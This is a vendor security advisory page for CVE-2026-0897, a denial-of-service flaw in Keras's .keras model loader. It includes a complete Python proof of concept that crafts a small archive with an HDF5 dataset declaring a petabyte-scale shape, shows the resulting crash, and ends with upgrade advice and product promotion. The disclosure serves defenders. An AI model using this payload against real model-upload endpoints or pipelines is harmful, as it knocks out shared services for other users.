CVE-2026-0897

CVE-2026-0897 is a high-severity allocation of resources without limits or throttling vulnerability in keras (pip), affecting versions >= 3.0.0, <= 3.12.0. It is fixed in 3.12.1, 3.13.2.

Summary

Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading,
Keras executes:
python result[key] = value[()] # loads entire dataset into memory
value[()] instructs h5py to allocate RAM proportional to the dataset’s declared shape, in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.

Proof of Concept

// PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor

# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
    hdf5_bytes = io.BytesIO()

    # Create an HDF5 file with a huge declared dataset shape
    with h5py.File(hdf5_bytes, "w") as f:
        d = f.create_dataset(
            "payload",
            shape=(50_000_000, 50_000_000),    # Extremely large shape → petabytes on load
            dtype="float32",
            compression="gzip",
            compression_opts=9
        )
        # Write minimal data so the file stays very small
        d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)

    hdf5_bytes.seek(0)

    # Build a valid .keras archive structure
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("config.json", "{}")
        z.writestr("metadata.json", "{}")
        z.writestr("model.weights.h5", hdf5_bytes.getvalue())

# Generate the malicious model file
create_malicious_keras()

# Trigger the DoS vulnerability when Keras loads the malicious file
KerasFileEditor("bomb.keras")

Expected Result

numpy._core._exceptions._ArrayMemoryError:
Unable to allocate 8.88 PiB for an array with shape (50000000, 50000000)

This crash occurs before any actual model processing, confirming the Denial-of-Service impact.

Impact

This vulnerability allows an attacker to crash any system that loads a malicious .keras model file.

The attacker can:

  • Cause immediate memory exhaustion (8+ PiB allocation attempts)
  • Crash TensorFlow / Python interpreter
  • Kill Jupyter kernels
  • Break automated model-upload pipelines
  • Crash MLOps servers that process user models
  • Deny service to shared GPU/CPU environments

If a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a Remote Denial of Service vector.
Additional PoC Evidence (Video Demonstration)
Attached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.

PoC Video (Google Drive):
PoC Video

Finding: Critical memory-exhaustion flaw triggered by crafted .keras model files
Vector: Malicious metadata causing extreme tensor shape inflation
Impact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process
Attack Scenario: Remote DoS on ML model processing pipelines and cloud inference services

Demonstration:
The PoC video shows the crash occurring on Google Colab.
Loading the malicious model consumed all system RAM and repeatedly terminated the runtime.
Severity is high enough that the compute quota dropped from 83 hours → 4 hours after only a few tests.
With larger payloads, this would instantly exhaust resources in real production pipelines.

The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap. Typical impact: resource exhaustion leading to denial of service.

Affected versions

keras (>= 3.0.0, <= 3.12.0) keras (>= 3.13.0, < 3.13.2)

Security releases

keras → 3.12.1 (pip) keras → 3.13.2 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

keras to 3.12.1 or later; keras to 3.13.2 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-0897? CVE-2026-0897 is a high-severity allocation of resources without limits or throttling vulnerability in keras (pip), affecting versions >= 3.0.0, <= 3.12.0. It is fixed in 3.12.1, 3.13.2. The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap.
  2. Which versions of keras are affected by CVE-2026-0897? keras (pip) versions >= 3.0.0, <= 3.12.0 is affected.
  3. Is there a fix for CVE-2026-0897? Yes. CVE-2026-0897 is fixed in 3.12.1, 3.13.2. Upgrade to this version or later.
  4. Is CVE-2026-0897 exploitable, and should I be worried? Whether CVE-2026-0897 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-0897 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-0897?
    • Upgrade keras to 3.12.1 or later
    • Upgrade keras to 3.13.2 or later

Other vulnerabilities in keras

CVE-2026-1462CVE-2026-1669CVE-2025-12060CVE-2025-12058CVE-2025-49655

Stop the waste.
Protect your environment with Kodem.